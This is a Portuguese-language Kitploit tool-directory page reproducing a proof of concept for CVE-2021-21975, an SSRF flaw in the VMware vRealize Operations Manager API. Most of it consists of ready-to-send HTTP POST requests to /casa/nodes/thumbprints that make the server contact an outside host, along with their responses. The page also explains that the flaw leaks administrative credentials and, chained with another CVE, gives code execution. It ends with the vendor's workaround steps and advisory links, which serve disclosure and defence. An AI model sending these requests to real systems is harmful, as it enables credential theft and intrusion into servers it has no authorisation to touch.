Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/murataydemir/cve-2021-21975
ReconnaissanceVulnerability AnalysisExploitationInformation GatheringWeb SecurityCloud Security
GitHubmurataydemir/cve-2021-21975

CVE-2021-21975

[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)

Ver Repositório
43há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

[CVE-2021-21975] VMware vRealize Operations Manager API Falsificação de Solicitação do Lado do Servidor (SSRF)


vRealize Operations (vROps) é uma ferramenta de gerenciamento de operações de TI autônomo, alimentada por IA, de apps a infraestrutura para otimizar, planejar e escalar implantações VMware Cloud e HCI, unificando o monitoramento de nuvem pública. A API do VMware vRealize Operations Manager 8.4 e todas as versões anteriores são vulneráveis à vulnerabilidade de Falsificação de Solicitação do Lado do Servidor (SSRF). A exploração bem-sucedida desta vulnerabilidade pode levar à leitura ou atualização de recursos internos e, neste caso, um invasor pode facilmente roubar credenciais administrativas do servidor vROps. Combinando CVE-2021-21975 e CVE-2021-21983, um invasor pode executar código arbitrário no servidor vRealize Operations remoto.

Prova de Conceito (PoC): Para explorar esta vulnerabilidade, você pode usar a seguinte requisição

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]

A resposta da requisição acima está abaixo

root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]
Captura de tela 2021-04-03 às 01 03 29 Captura de tela 2021-04-03 às 01 18 07

Além disso, as credenciais administrativas são divulgadas no cabeçalho Authorization.

Captura de tela 2021-04-03 às 01 19 39 Captura de tela 2021-04-03 às 01 24 34

Outras Provas de Conceito (PoCs): Ou você pode usar as seguintes requisições para detectar a vulnerabilidade CVE-2021-21975 VMware vRealize Operations Manager API Falsificação de Solicitação do Lado do Servidor (SSRF)

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]
Captura de tela 2021-04-03 às 00 00 20
root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]
Captura de tela 2021-04-03 às 00 01 00

Solução Alternativa: Se o patch não puder ser instalado, ou não houver patch para sua versão do vRealize Operations, as seguintes etapas podem ser tomadas para contornar o problema. Não há impacto no vRealize Operations ao aplicar esta solução alternativa.

Para contornar este problema no vRealize Operations, remova uma linha de configuração de casa-security-context.xml

  1. Faça login no nó primário como root via SSH ou Console, pressionando ALT+F1 em um Console para fazer login
  2. Abra /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml
  3. Encontre e remova a linha: <sec:http pattern="/nodes/thumbprints" security='none'/>
  4. Salve e feche o arquivo
  5. Reinicie o serviço CaSA com este comando: service vmware-casa restart
  6. Repita as etapas 1-5 em todos os outros nós do cluster vRealize Operations.

Para mais informações, visite as seguintes páginas.

https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html

Baixar ferramenta